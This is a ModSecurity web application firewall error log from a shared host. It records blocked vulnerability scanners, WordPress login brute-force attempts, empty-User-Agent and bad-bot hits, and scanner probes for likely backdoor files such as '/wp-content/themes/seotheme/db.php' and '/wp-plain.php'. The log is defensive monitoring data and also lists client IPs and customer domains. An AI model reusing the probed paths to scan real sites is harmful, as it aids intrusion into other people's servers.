[Tue May 26 18:10:00.721466 2026] [security2:error] [pid 973439:tid 973693] [client 46.176.156.90:53755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUoABg9mKRpdEFs3BhpQAAAHw"]
[Tue May 26 18:10:00.721598 2026] [security2:error] [pid 973439:tid 973693] [client 46.176.156.90:53755] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUoABg9mKRpdEFs3BhpQAAAHw"]
[Tue May 26 18:10:00.721633 2026] [security2:error] [pid 973439:tid 973693] [client 46.176.156.90:53755] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUoABg9mKRpdEFs3BhpQAAAHw"]
[Tue May 26 18:10:00.730061 2026] [security2:error] [pid 973439:tid 973583] [client 20.206.67.134:3648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/gdfhdyyu.php"] [unique_id "ahWUoABg9mKRpdEFs3BhpgAAAA4"], referer: www.google.com
[Tue May 26 18:10:01.198672 2026] [security2:error] [pid 973439:tid 973668] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUoQBg9mKRpdEFs3BhxAAAAGM"]
[Tue May 26 18:10:01.363965 2026] [security2:error] [pid 973439:tid 973623] [client 45.148.10.204:44418] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhkQAAADY"]
[Tue May 26 18:10:01.371579 2026] [security2:error] [pid 973439:tid 973687] [client 45.148.10.204:44406] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhkAAAAHY"]
[Tue May 26 18:10:01.388526 2026] [security2:error] [pid 973439:tid 973626] [client 45.148.10.204:44432] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhkgAAADk"]
[Tue May 26 18:10:01.452055 2026] [security2:error] [pid 973439:tid 973691] [client 45.148.10.204:44442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhkwAAAHo"]
[Tue May 26 18:10:01.456617 2026] [security2:error] [pid 973439:tid 973621] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhswAAADQ"]
[Tue May 26 18:10:01.604755 2026] [security2:error] [pid 973439:tid 973565] [remote 38.95.35.74:40430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUoQBg9mKRpdEFs3BhygAAPX0"]
[Tue May 26 18:10:01.625807 2026] [security2:error] [pid 973439:tid 973696] [client 46.176.156.90:53786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUoQBg9mKRpdEFs3Bh0AAAAH8"]
[Tue May 26 18:10:01.625915 2026] [security2:error] [pid 973439:tid 973696] [client 46.176.156.90:53786] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUoQBg9mKRpdEFs3Bh0AAAAH8"]
[Tue May 26 18:10:01.625940 2026] [security2:error] [pid 973439:tid 973696] [client 46.176.156.90:53786] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUoQBg9mKRpdEFs3Bh0AAAAH8"]
[Tue May 26 18:10:01.661520 2026] [security2:error] [pid 973439:tid 973633] [client 63.178.84.147:15392] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWUoQBg9mKRpdEFs3BhvQAAAEA"], referer: https://thegoodsporting.com
[Tue May 26 18:10:01.844433 2026] [security2:error] [pid 973439:tid 973462] [remote 38.95.35.74:40430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUoQBg9mKRpdEFs3Bh1QAAbhY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:10:02.061914 2026] [security2:error] [pid 973439:tid 973586] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUogBg9mKRpdEFs3Bh2QAAABE"]
[Tue May 26 18:10:02.292007 2026] [security2:error] [pid 973439:tid 973569] [client 45.148.10.204:44458] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhlAAAAAA"]
[Tue May 26 18:10:02.308088 2026] [security2:error] [pid 973439:tid 973579] [client 45.148.10.204:44462] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhlQAAAAo"]
[Tue May 26 18:10:02.310333 2026] [security2:error] [pid 973439:tid 973690] [client 45.148.10.204:44470] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhlgAAAHk"]
[Tue May 26 18:10:02.342233 2026] [security2:error] [pid 973439:tid 973667] [client 45.148.10.204:44472] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhlwAAAGI"]
[Tue May 26 18:10:02.366797 2026] [security2:error] [pid 973439:tid 973463] [remote 208.109.188.137:41362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUogBg9mKRpdEFs3Bh3gAAIxc"]
[Tue May 26 18:10:02.400908 2026] [security2:error] [pid 973439:tid 973572] [client 45.148.10.204:44476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhmgAAAAM"]
[Tue May 26 18:10:02.486696 2026] [security2:error] [pid 973439:tid 973692] [client 45.148.10.204:44516] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhoAAAAHs"]
[Tue May 26 18:10:02.487314 2026] [security2:error] [pid 973439:tid 973587] [client 45.148.10.204:44484] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhoQAAABI"]
[Tue May 26 18:10:02.496184 2026] [security2:error] [pid 973439:tid 973674] [client 46.176.156.90:53816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUogBg9mKRpdEFs3Bh6gAAAGk"]
[Tue May 26 18:10:02.496254 2026] [security2:error] [pid 973439:tid 973674] [client 46.176.156.90:53816] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUogBg9mKRpdEFs3Bh6gAAAGk"]
[Tue May 26 18:10:02.496271 2026] [security2:error] [pid 973439:tid 973674] [client 46.176.156.90:53816] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUogBg9mKRpdEFs3Bh6gAAAGk"]
[Tue May 26 18:10:02.529811 2026] [security2:error] [pid 973439:tid 973574] [client 45.148.10.204:44500] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUoABg9mKRpdEFs3BhnwAAAAU"]
[Tue May 26 18:10:02.904460 2026] [security2:error] [pid 973439:tid 973645] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUogBg9mKRpdEFs3Bh_gAAAEw"]
[Tue May 26 18:10:03.325955 2026] [security2:error] [pid 973439:tid 973684] [client 46.176.156.90:53851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUowBg9mKRpdEFs3BiBwAAAHM"]
[Tue May 26 18:10:03.326054 2026] [security2:error] [pid 973439:tid 973684] [client 46.176.156.90:53851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUowBg9mKRpdEFs3BiBwAAAHM"]
[Tue May 26 18:10:03.326080 2026] [security2:error] [pid 973439:tid 973684] [client 46.176.156.90:53851] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUowBg9mKRpdEFs3BiBwAAAHM"]
[Tue May 26 18:10:03.474328 2026] [security2:error] [pid 973439:tid 973631] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUogBg9mKRpdEFs3Bh9gAAAD4"]
[Tue May 26 18:10:03.741133 2026] [security2:error] [pid 973439:tid 973693] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUowBg9mKRpdEFs3BiFwAAAHw"]
[Tue May 26 18:10:04.192334 2026] [security2:error] [pid 973439:tid 973650] [client 46.176.156.90:53881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpABg9mKRpdEFs3BiJAAAAFE"]
[Tue May 26 18:10:04.192431 2026] [security2:error] [pid 973439:tid 973650] [client 46.176.156.90:53881] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpABg9mKRpdEFs3BiJAAAAFE"]
[Tue May 26 18:10:04.192453 2026] [security2:error] [pid 973439:tid 973650] [client 46.176.156.90:53881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpABg9mKRpdEFs3BiJAAAAFE"]
[Tue May 26 18:10:04.607213 2026] [security2:error] [pid 973439:tid 973655] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUpABg9mKRpdEFs3BiKAAAAFY"]
[Tue May 26 18:10:04.613016 2026] [security2:error] [pid 973439:tid 973620] [client 20.206.67.134:6500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-plain.php"] [unique_id "ahWUpABg9mKRpdEFs3BiLQAAADM"], referer: www.google.com
[Tue May 26 18:10:04.613082 2026] [security2:error] [pid 973439:tid 973584] [client 20.206.67.134:6465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWUpABg9mKRpdEFs3BiLAAAAA8"], referer: www.google.com
[Tue May 26 18:10:05.040330 2026] [security2:error] [pid 973439:tid 973659] [client 46.176.156.90:53918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiPgAAAFo"]
[Tue May 26 18:10:05.040424 2026] [security2:error] [pid 973439:tid 973659] [client 46.176.156.90:53918] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiPgAAAFo"]
[Tue May 26 18:10:05.040443 2026] [security2:error] [pid 973439:tid 973659] [client 46.176.156.90:53918] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiPgAAAFo"]
[Tue May 26 18:10:05.137618 2026] [security2:error] [pid 973439:tid 973588] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUpABg9mKRpdEFs3BiNAAAABM"]
[Tue May 26 18:10:05.473718 2026] [security2:error] [pid 973439:tid 973681] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUpQBg9mKRpdEFs3BiSgAAAHA"]
[Tue May 26 18:10:05.536747 2026] [security2:error] [pid 973439:tid 973627] [client 20.206.67.134:6482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiTwAAADo"]
[Tue May 26 18:10:05.653471 2026] [security2:error] [pid 973439:tid 973593] [client 20.206.67.134:6471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-plain.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiUwAAABg"], referer: www.google.com
[Tue May 26 18:10:05.653745 2026] [security2:error] [pid 973439:tid 973693] [client 20.206.67.134:6473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiVAAAAHw"], referer: www.google.com
[Tue May 26 18:10:05.922869 2026] [security2:error] [pid 973439:tid 973658] [client 46.176.156.90:53955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiXAAAAFk"]
[Tue May 26 18:10:05.923001 2026] [security2:error] [pid 973439:tid 973658] [client 46.176.156.90:53955] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiXAAAAFk"]
[Tue May 26 18:10:05.923042 2026] [security2:error] [pid 973439:tid 973658] [client 46.176.156.90:53955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpQBg9mKRpdEFs3BiXAAAAFk"]
[Tue May 26 18:10:06.327167 2026] [security2:error] [pid 973439:tid 973620] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUpgBg9mKRpdEFs3BiagAAADM"]
[Tue May 26 18:10:06.483218 2026] [security2:error] [pid 973439:tid 973652] [client 20.206.67.134:5137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWUpgBg9mKRpdEFs3BicgAAAFM"]
[Tue May 26 18:10:06.777022 2026] [security2:error] [pid 973439:tid 973671] [client 46.176.156.90:53990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpgBg9mKRpdEFs3BiegAAAGY"]
[Tue May 26 18:10:06.777138 2026] [security2:error] [pid 973439:tid 973671] [client 46.176.156.90:53990] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpgBg9mKRpdEFs3BiegAAAGY"]
[Tue May 26 18:10:06.777173 2026] [security2:error] [pid 973439:tid 973671] [client 46.176.156.90:53990] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpgBg9mKRpdEFs3BiegAAAGY"]
[Tue May 26 18:10:07.187347 2026] [security2:error] [pid 973439:tid 973616] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUpwBg9mKRpdEFs3BihwAAAC8"]
[Tue May 26 18:10:07.296998 2026] [security2:error] [pid 973439:tid 973477] [remote 132.148.72.88:46296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUpwBg9mKRpdEFs3BihAAAVyU"]
[Tue May 26 18:10:07.618107 2026] [security2:error] [pid 973439:tid 973668] [client 46.176.156.90:54020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpwBg9mKRpdEFs3BinQAAAGM"]
[Tue May 26 18:10:07.618205 2026] [security2:error] [pid 973439:tid 973668] [client 46.176.156.90:54020] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpwBg9mKRpdEFs3BinQAAAGM"]
[Tue May 26 18:10:07.618225 2026] [security2:error] [pid 973439:tid 973668] [client 46.176.156.90:54020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUpwBg9mKRpdEFs3BinQAAAGM"]
[Tue May 26 18:10:07.896714 2026] [security2:error] [pid 973439:tid 973615] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUpwBg9mKRpdEFs3BikQAAAC4"]
[Tue May 26 18:10:08.034492 2026] [security2:error] [pid 973439:tid 973676] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUqABg9mKRpdEFs3BipgAAAGs"]
[Tue May 26 18:10:08.400601 2026] [security2:error] [pid 973439:tid 973491] [remote 132.148.72.88:46296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUqABg9mKRpdEFs3BisAAAfTM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:10:08.475182 2026] [security2:error] [pid 973439:tid 973664] [client 46.176.156.90:54056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqABg9mKRpdEFs3BitgAAAF8"]
